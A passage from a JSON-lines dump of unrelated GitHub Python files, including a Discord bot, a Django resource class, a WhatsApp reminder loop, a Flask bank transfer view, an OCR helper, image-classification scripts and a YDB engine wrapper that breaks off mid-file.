message.channel.send('{ STARTING SHUTDOWN }')\r\n await message.channel.send('Shutdown Progress : 0%')\r\n if str(message.author.id) == developer_id:\r\n await message.channel.send('Shutdown Progress : 40%')\r\n await message.author.send('Enter password to access Developer Commands.')\r\n try:\r\n def check(m):\r\n return m.author == message.author\r\n await message.channel.send('Shutdown Progress : 80%')\r\n msg = await client.wait_for('message', check=check, timeout=15.0)\r\n except asyncio.TimeoutError:\r\n await message.channel.send('Failed to access shutdown that is Developer command : TIMEOUT')\r\n return\r\n else:\r\n if msg.content == access_password:\r\n await message.channel.send('Succeeded to access shutdown that is Developer command')\r\n await message.channel.send('Shutdown Progress : 100%')\r\n await message.channel.send('{ FINISHED SHUTDOWN }')\r\n sys.exit()\r\n else:\r\n await message.channel.send('Failed to access shutdown that is Developer command : INVALID PASSWORD')\r\n return\r\n\r\n else:\r\n await message.channel.send('Failed to access shutdown that is Developer command : PERMISSION ERROR')\r\n return\r\n\r\n elif message.content.startswith('&b startupdate '):\r\n if str(message.author.id) == developer_id:\r\n await message.author.send('Enter password to access Developer Commands.')\r\n try:\r\n def check(m):\r\n return m.author == message.author\r\n msg = await client.wait_for('message', check=check, timeout=15.0)\r\n except asyncio.TimeoutError:\r\n await message.author.send('Failed to access shutdown that is Developer command : TIMEOUT')\r\n return\r\n else:\r\n if msg.content == access_password:\r\n await message.author.send('Succeeded to access shutdown that is Developer command')\r\n a = message.content[15:]\r\n b = a[2:-1]\r\n ch = client.get_channel(int(b))\r\n await ch.send('<@569467294376394762> 업데이트를 시작합니다.')\r\n update_is = 1\r\n f = 
open('update.txt', 'w+t')\r\n f.write(str(update_is))\r\n f.close()\r\n return\r\n else:\r\n await message.author.send('Failed to access shutdown that is Developer command : INVALID PASSWORD')\r\n return\r\n\r\n else:\r\n await message.channel.send('Failed to access shutdown that is Developer command : PERMISSION ERROR')\r\n return\r\n\r\n elif message.content.startswith('&b finishupdate '):\r\n if str(message.author.id) == developer_id:\r\n await message.author.send('Enter password to access Developer Commands.')\r\n try:\r\n def check(m):\r\n return m.author == message.author\r\n msg = await client.wait_for('message', check=check, timeout=15.0)\r\n except asyncio.TimeoutError:\r\n await message.author.send('Failed to access shutdown that is Developer command : TIMEOUT')\r\n return\r\n else:\r\n if msg.content == access_password:\r\n await message.author.send('Succeeded to access shutdown that is Developer command')\r\n a = message.content[16:]\r\n b = a[2:-1]\r\n ch = client.get_channel(int(b))\r\n await ch.send('<@569467294376394762> 업데이트가 완료되었습니다.')\r\n update_is = 0\r\n f = open('update.txt', 'w+t')\r\n f.write(str(update_is))\r\n f.close()\r\n return\r\n else:\r\n await message.author.send('Failed to access shutdown that is Developer command : INVALID PASSWORD')\r\n return\r\n\r\n else:\r\n await message.channel.send('Failed to access shutdown that is Developer command : PERMISSION ERROR')\r\n return\r\n\r\n else:\r\n await message.channel.send('알 수 없는 구문이네요...')\r\n return\r\n else:\r\n return\r\n\r\n\r\naccess_token = os.environ[\"ACCESS_TOKEN\"]\r\nclient.run(access_token)\r\n","repo_name":"Bukgeuk/BukgeukBOT","sub_path":"BukgeukBOT.py","file_name":"BukgeukBOT.py","file_ext":"py","file_size_in_byte":24885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"14577684304","text":"from django.conf.urls import defaults as urls\nfrom django.core.urlresolvers import reverse\nfrom django.conf import settings\nfrom django import http\nfrom django.template import RequestContext\nfrom django.shortcuts import render_to_response, get_object_or_404\n\nfrom jpic import voodoo\nfrom jpic import tree\n\nfrom exceptions import *\n\nclass ResourceBase(voodoo.ppi):\n \"\"\"\n The base resource is like a controller in .\n\n It has his own set of actions, urls, and methods to generate a response.\n \"\"\"\n\n def __init__(self, **kwargs):\n \"\"\"\n Instanciate and validates the resource.\n\n :param inline: Resource that invokes this instance as an inline.\n :param parent: ResourceNode that manages routes to this resource.\n :param is_running: True when run() does self respawn.\n \"\"\"\n if 'inline' not in kwargs:\n self.inline = None\n if 'parent' not in kwargs:\n self.parent = None\n if 'is_running' not in kwargs:\n self.is_running = False\n\n # call the parent to set each kwarg as a property\n super(ResourceBase, self).__init__(**kwargs)\n\n if self.inline:\n # reference to the \"running\" context\n self.request = self.inline.request\n\n # backup kwargs for get_url\n #TODO blacklist request specific stuff be default (not hardcode)\n self.kwargs = kwargs\n\n # validate resource\n if not self._hasanyof(['model_class', 'name', 'urlname']):\n raise UnnamedResourceException(kwargs)\n\n self.validate()\n\n # back up any variable to kwargs\n for kwarg in self.add_to_kwargs:\n self.kwargs[kwarg] = getattr(self, kwarg)\n\n def validate(self):\n if self._has('name') and not self._has('urlname'):\n self.urlname = self.name\n elif self._has('urlname') 
and not self._has('name'):\n self.name = self.urlname\n\n @classmethod\n def instanciate(self, **kwargs):\n \"\"\"\n Return a new instance of the resource, with the givin kwargs \n \n Used by run()\n \"\"\"\n return self(**kwargs)\n\n @classmethod\n def run(self, request, *args, **kwargs):\n \"\"\"\n This method should instanciate a resource, check if permissions\n are OK, run the action and return a response.\n\n If the action doesn't return a response (instance of\n django.http.HttpResponse), then self.get_response will be called\n through self.response.\n\n This allows to cache responses.\n \"\"\"\n self = self.instanciate(is_running=True, request=request, **kwargs)\n\n # do permission check after setup, but before\n # action call. This means you should not do\n # any critical model update/deletion before self.action()\n if not self.permission:\n return http.HttpResponseForbidden()\n\n # Run the action\n # It can override anything that was set by run()\n response = self.action()\n\n if isinstance(response, http.HttpResponse):\n return response\n\n return self.response\n\n def get_urls(self): \n \"\"\"\n Returns a url.patterns for all actions.\n\n This is configurable by setting options to an action method, ie:\n details = setopt(details, urlname='details', urlregex=r'^(?P.+)/$')\n\n Other options are settable, but only urlname and urlregex are used here.\n \"\"\"\n urlpatterns = urls.patterns('')\n for action_method_name in self.actions_names:\n action = getattr(self, action_method_name)\n if hasattr(action, 'decorate'):\n action = self.decorate_action(action)\n\n # name and regex are action function attributes\n if hasattr(action, 'urlname') and hasattr(action, 'urlregex'):\n urlname = action.urlname\n urlregex = action.urlregex\n name = ''\n if self.parent:\n name += self.parent.urlname + '_'\n name += self.urlname + '_'\n name += urlname\n urlpatterns += urls.patterns('', \n urls.url(urlregex,\n self.__class__.run,\n name=name,\n kwargs=dict(action_method_name=action_method_name, **self.kwargs),\n )\n )\n return urlpatterns\n\n def get_add_to_kwargs(self):\n \"\"\"\n List of instance properties to copy to self.kwargs, done in __init__.\n\n For performance purposes, its possible to add values that are for example\n reversed from models definitions: get_formset_field_objects etc ...\n \"\"\"\n return []\n\n def root_url(self):\n \"\"\"\n Return the root url of the resource.\n\n It is not supposed to be hard coded.\n It prepends the urlname of the parent to its own urlname.\n \"\"\"\n #TODO make recursive parent check\n if self.parent:\n return \"/%s/%s\" % (self.parent.urlname, self.urlname)\n else:\n return \"/%s\" % self.urlname\n\n def get_context(self):\n \"\"\"\n Returns the context to use as base.\n \n By default, this adds the following variables:\n - resource is the instance,\n - media is self.media,\n - jsites_media_prefix is settings.JSITES_MEDIA_PREFIX\n - tree is self.tree or the paren't.\n - parent is the parent instance if any.\n \"\"\"\n context = {\n 'resource': self,\n 'media': self.media,\n 'jsites_media_prefix': settings.JSITES_MEDIA_PREFIX,\n }\n if self.parent:\n context['parent'] = self.parent\n context['tree'] = self.parent.tree\n else:\n context['tree'] = self.tree\n return context\n\n def add_to_context(self, name):\n \"\"\"\n Copies a variable from this instance to self.context\n \"\"\"\n self.context[name] = getattr(self, name)\n\n def get_permission(self, user=None, action_name=None, kwargs={}): # {{{ permissions\n \"\"\"\n Wraps around check_permission, 
setting resource instance defaults\n \"\"\"\n if not self.is_running and not user and not action_name:\n raise Exception(\"Not giving away a permission without action_name and user kwargs if not running\")\n\n if not action_name:\n action_name = self.action_name\n if not user:\n user = self.request.user\n if not kwargs:\n kwargs = self.kwargs\n\n return self.check_permission(user, action_name, kwargs)\n\n def check_permission(self, user, action_name, kwargs):\n \"\"\"\n Checks if a user can request an action with specified kwargs\n \"\"\" \n return True\n # }}}\n# {{{ action_url, action, action_name, action_method_name\n def get_action_method_name(self):\n if 'action_method_name' in self.kwargs:\n return self.kwargs['action_method_name']\n else:\n return self.action_name\n\n def get_action_name(self):\n if 'action_name' in self.kwargs:\n return self.kwargs['action_name']\n else:\n return self.action_method_name\n\n def get_action(self):\n return getattr(self, self.action_name)\n\n def get_action_url(self, action_name=None, kwargs=[]):\n if not action_name:\n if not self.is_running:\n raise Exception(\"Not giving an action url, for the current action if none is actually running\")\n\n action_name = self.action_name\n\n if self.parent:\n prefix = \"%s_%s_\" % (self.parent.urlname, self.urlname)\n else:\n prefix = \"%s_\" % self.urlname\n\n self.kwargs.update(kwargs)\n return reverse(prefix+action_name, kwargs=kwargs)\n \n def get_actions_names(self):\n return []\n # }}}\n # {{{ template, response\n def get_template(self):\n if not hasattr(self, 'action'):\n fallback = (\n '%s/index.html' % self.urlname,\n 'index.html',\n )\n else:\n fallback = (\n '%s/%s.html' % (self.urlname, self.action.__name__),\n '%s.html' % self.action.__name__,\n )\n return fallback\n\n def get_response(self):\n return render_to_response(\n self.template,\n self.context,\n context_instance=RequestContext(self.request)\n )\n # }}}\n def get_media_path(self):\n return None\n def get_media(self):\n return voodoo.converter(js=self.js, css=self.css)\n def get_js(self):\n if self.parent:\n return self.parent.js\n return []\n def get_css(self):\n if self.parent:\n return self.parent.css\n return {\n 'all': [],\n 'screen': [],\n 'projection': [],\n }\n def get_tree_items(self):\n \"\"\"\n Optionnaly recursive dict of verbose_name -> url\n \n By default, it checks for the verbose_name option of all method names\n declared in this class actions, and uses get_action_url(action_method_name)\n to reverse the action url.\n \"\"\"\n items = {}\n # try to add each action by default\n for action_method_name in self.actions_names:\n items[unicode(getattr(getattr(self, action_method_name), 'verbose_name'))] = self.get_action_url(action_method_name)\n return items\n\n def get_tree(self):\n \"\"\" Append all tree items to the parent tree, or a new tree instance \"\"\"\n if self.parent:\n return self.parent.tree\n else:\n navtree = tree.BaseTree()\n\n return tree.LinkTreeFactory(self.tree_items, navtree).tree\n","repo_name":"jpic/jsites","sub_path":"resources/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":9854,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"9521264527","text":"import requests\nimport time\nimport datetime\nimport logging\n\nfrom db import User, Message, MessageSenderRegistry\n\nTEMPLATE_URL = \"https://api.callmebot.com/whatsapp.php?phone={phone}&text={text}&apikey={apikey}\"\n\nwhile True:\n for user in User.get_users():\n phone = 
user.phone\n api_key = user.api_key\n\n for registry in MessageSenderRegistry.get_registry_by_username(username=user.username):\n if not registry.MessageSenderRegistry.is_sent:\n if datetime.datetime.now() > registry.MessageSenderRegistry.sending_time:\n url = TEMPLATE_URL.format(\n phone=phone,\n text=registry.Message.text,\n apikey=api_key\n )\n\n session = requests.Session()\n session.trust_env = False\n\n response = session.get(url=url)\n response_message = str(response.content)\n\n if \"ERROR\" in response_message:\n logging.warning(url)\n logging.warning(response_message)\n elif registry.MessageSenderRegistry.is_repeating:\n MessageSenderRegistry.update_table(\n {\n \"id\": registry.MessageSenderRegistry.id,\n \"sending_time\": datetime.datetime.now() + datetime.timedelta(\n minutes=registry.MessageSenderRegistry.repeating_interval\n )\n }\n )\n else:\n MessageSenderRegistry.update_table(\n {\n \"id\": registry.MessageSenderRegistry.id,\n \"is_sent\": True\n }\n )\n\n time.sleep(60)\n","repo_name":"jack-brolin/raspberry-pi-4","sub_path":"wapp-reminder-bot/app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"22021387736","text":"from flask import render_template, url_for, flash, redirect, request, Blueprint\nfrom bank import app, conn, bcrypt\nfrom bank.forms import TransferForm\nfrom flask_login import current_user\nfrom bank.models import select_user_accounts, transfer_account\nimport datetime\n\n\n\nUser = Blueprint('User', __name__)\n\n@User.route(\"/transfer\", methods=['GET', 'POST'])\ndef transfer():\n if not current_user.is_authenticated:\n flash('Please Login.','warning')\n return redirect(url_for('Login.login'))\n \n\n Username = current_user.get_id()\n print(Username)\n\n dropdown_accounts = select_user_accounts(current_user.get_id())\n drp_accounts = []\n for drp in dropdown_accounts:\n drp_accounts.append((drp[0], drp[1]))\n print(drp_accounts)\n form = TransferForm()\n form.sourceAccount.choices = drp_accounts\n form.targetAccount.choices = drp_accounts\n if form.validate_on_submit():\n date = datetime.date.today()\n amount = form.amount.data\n from_account = form.sourceAccount.data\n to_account = form.targetAccount.data\n transfer_account(date, amount, from_account, to_account)\n flash('Transfer succeed!', 'success')\n return redirect(url_for('Login.home'))\n return render_template('transfer.html', title='Transfer', drop_cus_acc=dropdown_accounts, form=form)\n","repo_name":"emiloerum/DIS_GroupProject","sub_path":"DIS_bankProject/bank/User/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":1340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"16912012504","text":"\"\"\"Write a Python function that takes a list and returns a new list with unique elements of the first list. 
Go to the editor\nSample List : [1,2,3,3,3,3,4,5]\nUnique List : [1, 2, 3, 4, 5]\"\"\"\n\ndef unique(l):\n s = set(l)\n return list(s)\n\nl = list(map(int,input().split()))\nprint(unique(l))","repo_name":"nekapoor7/Python-and-Django","sub_path":"PythonNEW/Function/UniqueElements.py","file_name":"UniqueElements.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"29092862428","text":"import os\nfrom os.path import (join, splitext, exists)\nfrom c19mining.utils import (mkdir, explore_dir)\nimport pdf2image\ntry:\n from PIL import Image\nexcept ImportError:\n import Image\nimport pytesseract\n\nclass TesseOCR(object):\n \"\"\"An Optical Character Recognition class based on tesseract\"\"\"\n def __init__(self, lang):\n super(TesseOCR, self).__init__()\n self.lang = lang if lang else 'eng'\n\n def get_text_from_pdf(self, pdf_path):\n \"\"\"convert a pdf file into text\"\"\"\n text = ''\n images = pdf2image.convert_from_path(pdf_path)\n for pg, img in enumerate(images):\n text += pytesseract.image_to_string(img)\n return text\n\n def get_text_from_jpg(self, image_path):\n \"\"\"convert a jpg image into text\"\"\"\n try:\n img = Image.open(image_path)\n except Exception as e:\n raise e\n text = pytesseract.image_to_string(img, lang=self.lang)\n return text\n\n def parse_book(self, book_path, out_text):\n mkdir(book_path, 'texts')\n for (image_page, fname) in explore_dir(book_path, yield_extension='jpg'):\n bname = splitext(fname)[0]\n text_path = join(out_text, 'texts', bname+'.txt')\n if exists(text_path):\n continue\n try:\n t = self.get_text_from_jpg(image_page)\n except Exception as e:\n t = ''\n\n if len(t) > 0:\n with open(text_path, 'w') as f:\n f.write(t)\n print('Created', text_path)\n","repo_name":"alemol/covidminer","sub_path":"c19mining/ocr.py","file_name":"ocr.py","file_ext":"py","file_size_in_byte":1575,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"28025683071","text":"from database import Operation\nfrom qiwi import Qiwi\nfrom config import token_telegram, token_qiwi, number\nimport telebot\nfrom telebot import types\n\nbot = telebot.TeleBot(token_telegram)\n\n\n@bot.message_handler(commands=['start', 'help'])\ndef send_welcome(message):\n keyboard = types.ReplyKeyboardMarkup(row_width=2, resize_keyboard=True)\n action = types.KeyboardButton(text=\"Проверить\")\n keyboard.add(action)\n bot.send_message(message.chat.id,\n f\"Для покупки аккаунта вам необходимо отправить 100р на данный\"\n f\" qiwi кошелек {number} с комментарием {message.from_user.id}.\"\n f\" После чего нажать на кнопку 'Проверить' и ожидать последующей \"\n f\"информации\"\n , reply_markup=keyboard)\n\n\n@bot.message_handler(regexp=\"Проверить\")\ndef handle_message(message):\n check = Qiwi(token_qiwi)\n elements_to_check = check.find_pay(str(message.from_user.id), check.get_history())\n # print(elements_to_check)\n if elements_to_check['total']['amount'] == 10 and elements_to_check['total']['currency'] == 643:\n my_database = Operation()\n if my_database.select(str(message.from_user.id), elements_to_check['date']):\n bot.send_message(message.chat.id, f'Новых платежей от вас не поступало')\n else:\n my_database.commit(str(message.from_user.id),elements_to_check['date'])\n bot.send_message(message.chat.id, f'Логин:{12}\\nПароль:{1}')\n else:\n bot.send_message(message.chat.id, 'Ожидаются 
данный')\n\n\n\n\nbot.polling()\n","repo_name":"paramoun1h/telegram_seller","sub_path":"main_application.py","file_name":"main_application.py","file_ext":"py","file_size_in_byte":1784,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"29100077012","text":"import re\n\n\ndef read_text(datafile):\n with open(datafile, 'r') as f:\n text = f.read()\n f.close()\n return text\n\n\ndef find_marker(text, index='all'):\n regex = re.compile(r'\\((\\d+)x(\\d+)\\)')\n if index is not 'all':\n return regex.match(text, index)\n else:\n return re.search(regex.pattern, text)\n\n\ndef decompress(text):\n result = ''\n i = 0\n while i < len(text):\n match = find_marker(text, i)\n if match:\n start = int(match.end())\n end = start + int(match.group(1))\n n = int(match.group(2))\n chunk = text[start: end]\n result += chunk * n\n i = start + len(chunk)\n else:\n result += text[i]\n i += 1\n return result\n\n\ndef full_decompress(text):\n '''\n It works for resonably sized strings (e.g. the test cases).\n It would too long to run on test input so implemented Peter Norvigs\n strategy (not shown here) simply to get an answer, but again, this works\n ... you just need a super computer.\n '''\n markers = find_marker(text)\n result = text\n while markers:\n result = decompress(result)\n markers = find_marker(result)\n return result\n\n\ndef norvig(text):\n length = 0\n i = 0\n while i < len(text):\n match = find_marker(text, i)\n if match:\n interval, n = map(int, match.groups())\n i = int(match.end())\n length += n * norvig(text[i: i + interval])\n i += interval\n else:\n length += 1\n i += 1\n return length\n\n\ndef main():\n # Part 1\n print(len(decompress(read_text('input9.txt'))))\n # Part 2\n # print(len(full_decompress(read_text('input9.txt'))))\n print(norvig(read_text('input9.txt')))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"jrjed/advent_of_code_2016","sub_path":"day9/script9.py","file_name":"script9.py","file_ext":"py","file_size_in_byte":1823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"9209213639","text":"import cv2\r\nimport numpy as np\r\nimport os\r\nfrom random import shuffle\r\nfrom tqdm import tqdm\r\nimport tensorflow as tf\r\nimport matplotlib.pyplot as plt\r\nimport tflearn\r\nfrom tflearn.layers.conv import conv_2d, max_pool_2d\r\nfrom tflearn.layers.core import input_data, dropout, fully_connected\r\nfrom tflearn.layers.estimator import regression\r\n\r\n\r\nTRAIN_DIR = 'C:\\\\Users\\\\user\\\\Downloads\\\\project\\\\cell_images\\\\cell_images\\\\com'\r\nTEST_DIR = 'C:\\\\Users\\\\user\\\\Downloads\\\\project\\\\test'\r\nIMG_SIZE = 100\r\nLR = 1e-3\r\nMODEL_NAME = 'maleria'\r\ndef create_label(image_name) :\r\n\tworld_label = image_name[0]\r\n\tif world_label == '1':\r\n\t\treturn np.array([1,0])\r\n\telif world_label == '0':\r\n\t\treturn np.array([0,1])\r\n\r\n\r\ndef create_train_data():\r\n\ttraining_data = []\r\n\tfor img in tqdm(os.listdir(TRAIN_DIR)):\r\n\t\tpath = os.path.join(TRAIN_DIR, img)\r\n\t\timg_data = cv2.imread(path, cv2.IMREAD_GRAYSCALE)\r\n\t\t#img_data = cv2.resize(img_data, (IMG_SIZE, IMG_SIZE))\r\n\t\ttraining_data.append([np.array(img_data), create_label(img)])\r\n\tshuffle(training_data)\r\n\tnp.save('train_data.npy', training_data)\r\n\treturn training_data\r\n\r\n\r\ndef create_test_data():\r\n\ttesting_data = []\r\n\tfor img in tqdm(os.listdir(TEST_DIR)):\r\n\t\tpath = os.path.join(TEST_DIR, img)\r\n\t\timg_num = 
(img.split('.'))[0][0]\r\n\t\timg_data = cv2.imread(path, cv2.IMREAD_GRAYSCALE)\r\n\t\t#img_data = cv2.resize(img_data, (IMG_SIZE, IMG_SIZE))\r\n\t\ttesting_data.append([np.array(img_data), img_num])\r\n\tshuffle(testing_data)\r\n\tnp.save('test_data.npy', testing_data)\r\n\treturn testing_data\r\n\t \r\n\r\ntrain_data = create_train_data()\r\ntest_data = create_test_data()\r\n\r\ntrain = train_data[:-500]\r\ntest = train_data[-500:]\r\nX_train = np.array([i[0] for i in train]).reshape(-1, IMG_SIZE, IMG_SIZE, 1)\r\ny_train = [i[1] for i in train]\r\nX_test = np.array([i[0] for i in test]).reshape(-1, IMG_SIZE, IMG_SIZE, 1)\r\ny_test = [i[1] for i in test]\r\n \r\ndef create_model():\r\n tf.reset_default_graph()\r\n convnet = input_data(shape=[None, IMG_SIZE, IMG_SIZE, 1], name='input')\r\n convnet = conv_2d(convnet, 32, 5, activation='relu')\r\n convnet = max_pool_2d(convnet, 5)\r\n convnet = conv_2d(convnet, 64, 5, activation='relu')\r\n convnet = max_pool_2d(convnet, 5)\r\n convnet = conv_2d(convnet, 128, 5, activation='relu')\r\n convnet = max_pool_2d(convnet, 5)\r\n convnet = conv_2d(convnet, 64, 5, activation='relu')\r\n convnet = max_pool_2d(convnet, 5)\r\n convnet = conv_2d(convnet, 32, 5, activation='relu')\r\n convnet = max_pool_2d(convnet, 5)\r\n convnet = fully_connected(convnet, 1024, activation='relu', name='d1')\r\n convnet = dropout(convnet, 0.8)\r\n convnet = fully_connected(convnet, 2, activation='softmax')\r\n convnet = regression(convnet, optimizer='adam', learning_rate=LR, loss='categorical_crossentropy', name='targets')\r\n model = tflearn.DNN(convnet, tensorboard_dir='log', tensorboard_verbose=3)\r\n return model\r\n\r\nmodel=create_model()\r\nmodel.fit({'input': X_train}, {'targets': y_train}, n_epoch=13, validation_set=({'input': X_test}, {'targets': y_test}), snapshot_step=500, show_metric=True, run_id=MODEL_NAME)\r\nmodel.save('C:\\\\Users\\\\user\\\\Downloads\\\\project\\\\model.tfl')\r\n\r\ndense1_vars = tflearn.variables.get_layer_variables_by_name('d1')\r\nprint(\"Dense1 layer weights:\")\r\nprint(model.get_weights(dense1_vars[0]))\r\n\r\nfig = plt.figure(figsize=(16, 12))\r\n\r\nfor num, data in enumerate(test_data[:16]):\r\n\r\n\timg_num = data[1]\r\n\timg_data = data[0]\r\n\r\n\ty = fig.add_subplot(4, 4, num + 1)\r\n\torig = img_data\r\n\tdata = img_data.reshape(IMG_SIZE, IMG_SIZE, 1)\r\n\tmodel_out = model.predict([data]) [0]\r\n\r\n\tif np.argmax(model_out) == 1:\r\n\t\tstr_label = 'Not Infected' + img_num\r\n\telse:\r\n\t\tstr_label = 'Infected' + img_num\r\n\r\n\ty.imshow(orig, cmap='gray')\r\n\tplt.title(str_label)\r\n\ty.axes.get_xaxis().set_visible(False)\r\n\ty.axes.get_yaxis().set_visible(False)\r\nplt.show()\r\n","repo_name":"pcvinayak/micro-organism-detector","sub_path":"nn3.py","file_name":"nn3.py","file_ext":"py","file_size_in_byte":3820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"44490183022","text":"from keras.models import Model, load_model\nfrom keras.layers import Input, Reshape, TimeDistributed\nfrom sklearn.svm import SVC\nfrom sklearn.metrics import accuracy_score\nimport ffmpeg\nimport numpy as np\nfrom data import Data\nimport random\nfrom tabulate import tabulate\nfrom matplotlib import pyplot as plt\nfrom generator import MyGenerator\nimport os\n\nCHUNK_SIZE = 20\nMODEL_NO = 5\nDECODER_LENGTH = 10\nEMBEDDING_SIZE = 625\n\nFILE_APPENDIX = \"\"\n\ndef load_model_encoder(inputs, number=0, cnn_decoder_length=10):\n cnn_model = load_model(\"models/model_cnn_run\" + 
str(number) + \".h5\")\n cnn_encoder = Model(cnn_model.inputs, cnn_model.layers[-cnn_decoder_length].output)\n \n time_cnn = TimeDistributed(cnn_encoder)(inputs)\n\n reshape = Reshape((19, EMBEDDING_SIZE))(time_cnn)\n\n lstm_model = load_model(\"models/model_lstm_predict_run\" + str(number) + \".h5\")\n lstm_encoder = Model(lstm_model.inputs, lstm_model.layers[-3].output)\n\n embedding = lstm_encoder(reshape)\n return Model(inputs, embedding)\n \n\nbig_X = []\nbig_y = []\n\n# if there exists preprocessed data for the specified model, we don't have to process it again\nif (os.path.isfile(\"preprocessed/embedding\" + FILE_APPENDIX + str(MODEL_NO) + \".npy\") \n and os.path.isfile(\"preprocessed/labels\" + FILE_APPENDIX + str(MODEL_NO) + \".npy\")):\n\n big_X = np.load(\"preprocessed/embedding\" + FILE_APPENDIX + str(MODEL_NO) + \".npy\")\n big_y = np.load(\"preprocessed/labels\" + FILE_APPENDIX + str(MODEL_NO) + \".npy\")\n print(\"Loaded preprocessed file.\")\nelse:\n # preprocess the data by running it through our models\n input_dims = (19, 400, 400, 1)\n inputs = Input(shape=input_dims)\n\n my_model = load_model_encoder(inputs, MODEL_NO, DECODER_LENGTH)\n my_model.summary()\n\n data_set = np.load(\"prepared_ids.npy\")\n\n chunks = int(len(data_set) / CHUNK_SIZE)\n print(\"Datensatz: \" + str(len(data_set)))\n print(\"Chunks: \" + str(chunks))\n\n data_set = data_set[: chunks * CHUNK_SIZE]\n\n print(\"Getrimmter Datensatz: \" + str(len(data_set)))\n\n for i in range(chunks):\n X = []\n current_data = data_set[i*CHUNK_SIZE:(i+1)*CHUNK_SIZE]\n for file in current_data:\n out, _ = (\n\t ffmpeg\n\t .input(file)\n\t .output('pipe:', format='rawvideo', pix_fmt='gray')\n\t .run(quiet=True)\n )\n video = (\n\t np\n\t .frombuffer(out, np.uint8)\n\t .reshape([20, 400, 400, 1])\n )\n X.append((video/255)[:19])\t\n if \"calving\" in file:\n #calved_count += 1\n big_y.append(0)\n else:\n #random_count += 1\n big_y.append(1)\n print(file)\n\n \n print(np.shape(X))\n video_origin = np.array(X)\n\n embedding = my_model.predict(video_origin)\n embedding = embedding.reshape(-1, 16)\n print(np.shape(embedding))\n\n big_X.extend(embedding)\n print(\"Shape of big_X: \" + str(np.shape(big_X)))\n\n np.save(\"preprocessed/embedding\" + FILE_APPENDIX + str(MODEL_NO), big_X)\n np.save(\"preprocessed/labels\" + FILE_APPENDIX + str(MODEL_NO), big_y)\n\n print(np.shape(big_y))\n print(\"Amount zeros: \" + str(big_y.count(0)))\n print(\"Amount ones: \" + str(big_y.count(1)))\n\ntestsize = int(len(big_X) / 10)\n\naccuracy_scores = np.zeros(10)\n\nfor i in range(10):\n X_train = [*big_X[: i * testsize], *big_X[(i+1) * testsize :]]\n X_test = big_X[i * testsize : (i+1) * testsize]\n\n y_train = [*big_y[: i * testsize], *big_y[(i+1) * testsize :]]\n y_test = big_y[i * testsize : (i+1) * testsize]\n\n clf = SVC(kernel=\"rbf\")\n clf.fit(X_train, y_train)\n\n y_pred = clf.predict(X_test)\n accuracy_scores[i] = accuracy_score(y_test, y_pred)\n\nprint(\"Accuracy Scores: \" + str(accuracy_scores))\nprint(\"Average: \" + str(np.average(accuracy_scores)))\n\n","repo_name":"Committener-Gordon/code","sub_path":"stats/eval_cnn_lstm_predict_svm.py","file_name":"eval_cnn_lstm_predict_svm.py","file_ext":"py","file_size_in_byte":3889,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"1222442371","text":"from __future__ import annotations\n\nimport os\nfrom typing import (\n Any,\n Callable,\n NamedTuple,\n Optional,\n Sequence,\n Type,\n)\n\nimport shortuuid\nimport sqlalchemy 
as sa\nfrom sqlalchemy.types import TypeEngine\nimport ydb\n\nfrom dl_db_testing.database.engine_wrapper import EngineWrapperBase\n\n\nclass YdbTypeSpec(NamedTuple):\n type: ydb.PrimitiveType\n to_sql_str: Callable[[Any], str]\n\n\nSA_TYPE_TO_YDB_TYPE: dict[Type[TypeEngine], YdbTypeSpec] = {\n sa.SmallInteger: YdbTypeSpec(type=ydb.PrimitiveType.Uint8, to_sql_str=str),\n sa.Integer: YdbTypeSpec(type=ydb.PrimitiveType.Int32, to_sql_str=str),\n sa.BigInteger: YdbTypeSpec(type=ydb.PrimitiveType.Int64, to_sql_str=str),\n sa.Float: YdbTypeSpec(type=ydb.PrimitiveType.Double, to_sql_str=str),\n sa.Boolean: YdbTypeSpec(type=ydb.PrimitiveType.Bool, to_sql_str=lambda x: str(bool(x))),\n sa.String: YdbTypeSpec(type=ydb.PrimitiveType.String, to_sql_str=lambda x: f'\"{x}\"'),\n sa.Unicode: YdbTypeSpec(type=ydb.PrimitiveType.Utf8, to_sql_str=lambda x: f'\"{x}\"'),\n sa.Date: YdbTypeSpec(type=ydb.PrimitiveType.Date, to_sql_str=lambda x: f'DateTime::MakeDate($date_parse(\"{x}\"))'),\n sa.DateTime: YdbTypeSpec(\n ydb.PrimitiveType.Datetime, to_sql_str=lambda x: f'DateTime::MakeDatetime($datetime_parse(\"{x}\"))'\n ),\n sa.TIMESTAMP: YdbTypeSpec(\n ydb.PrimitiveType.Timestamp, to_sql_str=lambda x: f'DateTime::MakeTimestamp($datetime_parse(\"{x}\"))'\n ),\n}\n\n\nclass YQLEngineWrapper(EngineWrapperBase):\n URL_PREFIX = \"yql\"\n\n def get_conn_credentials(self, full: bool = False) -> dict:\n return dict(\n endpoint=self.engine.url.query[\"endpoint\"],\n db_name=self.engine.url.query[\"database\"],\n )\n\n def get_version(self) -> Optional[str]:\n return None\n\n def _generate_table_description(self, columns: Sequence[sa.Column]) -> ydb.TableDescription:\n table = ydb.TableDescription().with_columns(\n *[ydb.Column(col.name, ydb.OptionalType(SA_TYPE_TO_YDB_TYPE[type(col.type)].type)) for col in columns]\n )\n primary_keys = [col.name for col in columns if False] # if primary_key] # FIXME\n if not primary_keys:\n primary_keys = [columns[0].name]\n return table.with_primary_keys(*primary_keys)\n\n def _get_table_path(self, table: sa.Table) -> 